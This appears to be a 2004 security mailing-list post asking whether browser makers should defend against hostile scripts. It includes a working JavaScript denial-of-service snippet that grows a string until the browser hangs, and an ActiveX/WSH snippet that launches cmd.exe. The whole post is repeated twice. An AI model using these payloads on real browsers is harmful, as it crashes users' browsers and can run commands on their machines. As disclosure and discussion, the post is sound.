Bipin Gautam
09/04/04, 19:25
Browser bugs [DoS] ... where will you draw a line?
Shouldn't developers [of Browsers] draw a line... between a DoS bug and a "can be troublesome" feature in their web-browsern and put necessary measures in their code to protect form such nasty codes. These days... I’ve been seeing lot of stupid IE/Mozill
a DoS exploits. They do get patched. Should we need another "Bloodhound" technology in brouser as well for such but...... it's strange to see neither neither a antivirus softwares nor IE / MOZILLA are putting necessary efforts in their code to prevent su
ch hostile scripts.....?
------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
-------------
OR
you could just have a scripts that kicks a infinite pop up windows!!! or at worst...... lets add a WSH script...
--------------------------------------
I guess this bug has patch…
--------------------------------------
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmd.exe /k echo ...today is your lucky day!");
</script>
--------------------------------------
.... such browser features are far *MORE* troublesome than *any* browser DoS BUGS!!!
the solution shouldn't be to disable scripting...... etc!
so ??????
../hUNT3R
-------------------------------------
http://www.geocities.com/visitbipin
http://www.01security.com
Shouldn't developers [of Browsers] draw a line... between a DoS bug and a "can be troublesome" feature in their web-browsern and put necessary measures in their code to protect form such nasty codes. These days... I’ve been seeing lot of stupid IE/Mozill
a DoS exploits. They do get patched. Should we need another "Bloodhound" technology in brouser as well for such but...... it's strange to see neither neither a antivirus softwares nor IE / MOZILLA are putting necessary efforts in their code to prevent su
ch hostile scripts.....?
------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
-------------
OR
you could just have a scripts that kicks a infinite pop up windows!!! or at worst...... lets add a WSH script...
--------------------------------------
I guess this bug has patch…
--------------------------------------
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmd.exe /k echo ...today is your lucky day!");
</script>
--------------------------------------
.... such browser features are far *MORE* troublesome than *any* browser DoS BUGS!!!
the solution shouldn't be to disable scripting...... etc!
so ??????
../hUNT3R
-------------------------------------
http://www.geocities.com/visitbipin
http://www.01security.com